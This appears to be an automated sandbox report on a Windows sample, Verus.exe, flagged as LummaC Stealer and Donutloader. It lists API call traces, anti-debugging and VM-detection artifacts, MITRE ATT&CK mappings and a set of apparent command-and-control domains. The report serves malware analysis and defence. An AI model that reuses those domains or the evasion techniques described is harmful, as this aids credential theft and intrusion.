Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_004468C0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,DragQueryFileW,DragQueryFileW,DragQueryFileW,CloseClipboard,

0_2_004468C0

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_004468C0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,DragQueryFileW,DragQueryFileW,DragQueryFileW,CloseClipboard,

0_2_004468C0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_00BA9AF1 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_00BA9AF1

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_0042E530: _memset,CreateEventW,ResetEvent,WaitForSingleObject,CloseHandle,_memset,DeviceIoControl,GetLastError,

0_2_0042E530

Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004A6509	0_2_004A6509
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004A62ED	0_2_004A62ED
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004A8373	0_2_004A8373
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004A632F	0_2_004A632F
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0042E530	0_2_0042E530
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0042A650	0_2_0042A650
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004406C0	0_2_004406C0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004788E0	0_2_004788E0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0045CB70	0_2_0045CB70
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00476C50	0_2_00476C50
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00418DA0	0_2_00418DA0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0048EE30	0_2_0048EE30
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0048F030	0_2_0048F030
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00453190	0_2_00453190
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0048F430	0_2_0048F430
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0041D4D0	0_2_0041D4D0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0041D5C0	0_2_0041D5C0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0041D6A9	0_2_0041D6A9
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0041D7A0	0_2_0041D7A0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00493978	0_2_00493978
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004B9E30	0_2_004B9E30
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004A5F58	0_2_004A5F58
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B506F3	0_2_00B506F3
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00BA9AF1	0_2_00BA9AF1
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B75080	0_2_00B75080
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B67007	0_2_00B67007
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B50001	0_2_00B50001
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B7D070	0_2_00B7D070
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B5F040	0_2_00B5F040
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B6C106	0_2_00B6C106
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B6E106	0_2_00B6E106
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B552E0	0_2_00B552E0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B963E0	0_2_00B963E0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B72350	0_2_00B72350
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B684F2	0_2_00B684F2
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B8D4E0	0_2_00B8D4E0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B5F430	0_2_00B5F430
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B59440	0_2_00B59440
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B5B566	0_2_00B5B566

Source: C:\Users\user\Desktop\Verus.exe	Code function: String function: 00415400 appears 44 times
Source: C:\Users\user\Desktop\Verus.exe	Code function: String function: 00444320 appears 92 times
Source: C:\Users\user\Desktop\Verus.exe	Code function: String function: 00479110 appears 52 times
Source: C:\Users\user\Desktop\Verus.exe	Code function: String function: 00491E54 appears 94 times
Source: C:\Users\user\Desktop\Verus.exe	Code function: String function: 00476150 appears 49 times

Source: C:\Users\user\Desktop\Verus.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 1812

Source: Verus.exe

Static PE information: invalid certificate

Source: Verus.exe	Binary or memory string: OriginalFilename vs Verus.exe
Source: Verus.exe, 00000000.00000003.1877634347.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFeyWriter.exe4 vs Verus.exe
Source: Verus.exe, 00000000.00000000.1720934904.00000000005BA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFeyWriter.exe4 vs Verus.exe
Source: Verus.exe	Binary or memory string: OriginalFilenameFeyWriter.exe4 vs Verus.exe

Source: Verus.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/5@11/9

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_00424350 ShowWindow,GetDiskFreeSpaceExW,DestroyWindow,

0_2_00424350

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_00B50E03 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_00B50E03

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_0043F0B0 CoCreateInstance,

0_2_0043F0B0

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_00456840 FindResourceW,SizeofResource,LoadResource,LockResource,__aligned_recalloc,GlobalUnlock,

0_2_00456840

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7416

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\62670c39-8b41-4c3f-abb1-43f1907094d8

Jump to behavior

Source: Verus.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Verus.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Verus.exe

Virustotal: Detection: 8%

Source: Verus.exe	String found in binary or memory: ::/how_to_use/working_with_projects/add_boot_image.html
Source: Verus.exe	String found in binary or memory: )@isoUntitledDisc Images (.iso).isoFeyWriter::/how_to_use/working_with_projects/add_boot_image.htmladdbootimage%d %d0x%xP

Source: C:\Users\user\Desktop\Verus.exe

File read: C:\Users\user\Desktop\Verus.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Verus.exe "C:\Users\user\Desktop\Verus.exe"
Source: C:\Users\user\Desktop\Verus.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 1812

Source: C:\Users\user\Desktop\Verus.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Verus.exe

Static file information: File size 2394152 > 1048576

Source: Verus.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x155a00

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_0042E6D0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0042E6D0

Source: Verus.exe

Static PE information: real checksum: 0x1c2201a should be: 0x257377

Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004962A1 push ecx; ret	0_2_004962B4
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0042B548 push esp; iretd	0_2_0042B549
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00449769 pushfd ; retf 0002h	0_2_00449771

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_0044D0E0 IsWindowVisible,IsZoomed,IsIconic,IsZoomed,GetWindowRect,IsZoomed,

0_2_0044D0E0

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_00475810 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00475810

Source: C:\Users\user\Desktop\Verus.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Verus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Verus.exe

API coverage: 0.4 %

Source: C:\Users\user\Desktop\Verus.exe TID: 7596

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Verus.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00420B80 SendMessageW,SendMessageW,SendMessageW,GetModuleFileNameW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcpyW,SendMessageW,lstrcmpW,SendMessageW,SendMessageW,FindNextFileW,FindClose,	0_2_00420B80
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004BD1D0 FindFirstFileW,lstrcmpW,lstrcmpW,	0_2_004BD1D0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0045D260 lstrcpyW,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcpyW,lstrcatW,FindNextFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcpyW,lstrcatW,FindNextFileW,FindClose,	0_2_0045D260

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Verus.exe, 00000000.00000003.1938818608.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000002.2123122400.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Verus.exe, 00000000.00000002.2123122400.000000000074E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Verus.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Verus.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Verus.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_004911AA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_004911AA

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_0042E6D0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0042E6D0

Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B506F3 mov edx, dword ptr fs:[00000030h]	0_2_00B506F3
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B50CB3 mov eax, dword ptr fs:[00000030h]	0_2_00B50CB3
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B51063 mov eax, dword ptr fs:[00000030h]	0_2_00B51063
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B51303 mov eax, dword ptr fs:[00000030h]	0_2_00B51303
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00B51302 mov eax, dword ptr fs:[00000030h]	0_2_00B51302

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_00490B59 GetProcessHeap,HeapFree,

0_2_00490B59

Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004911AA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_004911AA
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004958B6 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_004958B6

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Verus.exe	String found in binary or memory: drawwyobstacw.sbs
Source: Verus.exe	String found in binary or memory: ehticsprocw.sbs
Source: Verus.exe	String found in binary or memory: condifendteu.sbs
Source: Verus.exe	String found in binary or memory: resinedyw.sbs
Source: Verus.exe	String found in binary or memory: vennurviot.sbs
Source: Verus.exe	String found in binary or memory: allocatinow.sbs
Source: Verus.exe	String found in binary or memory: enlargkiw.sbs
Source: Verus.exe	String found in binary or memory: enginenek.buzz
Source: Verus.exe	String found in binary or memory: mathcucom.sbs

Source: C:\Users\user\Desktop\Verus.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_0045C7B0 SHGetFileInfoW,lstrcpyW,GetLocalTime,SystemTimeToFileTime,FileTimeToDosDateTime,SendMessageW,

0_2_0045C7B0

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_004BC690 GetTimeZoneInformation,

0_2_004BC690

Source: C:\Users\user\Desktop\Verus.exe

Code function: 0_2_0044F760 _memset,SystemParametersInfoW,_memset,GetObjectW,lstrcmpW,CreateFontIndirectW,DeleteObject,DeleteObject,DeleteObject,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetWindowDC,SelectObject,DrawTextW,DrawTextW,SetRectEmpty,DrawTextW,SelectObject,_memset,GetVersionExW,SystemParametersInfoW,SystemParametersInfoW,ReleaseDC,

0_2_0044F760

Source: C:\Users\user\Desktop\Verus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	2 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
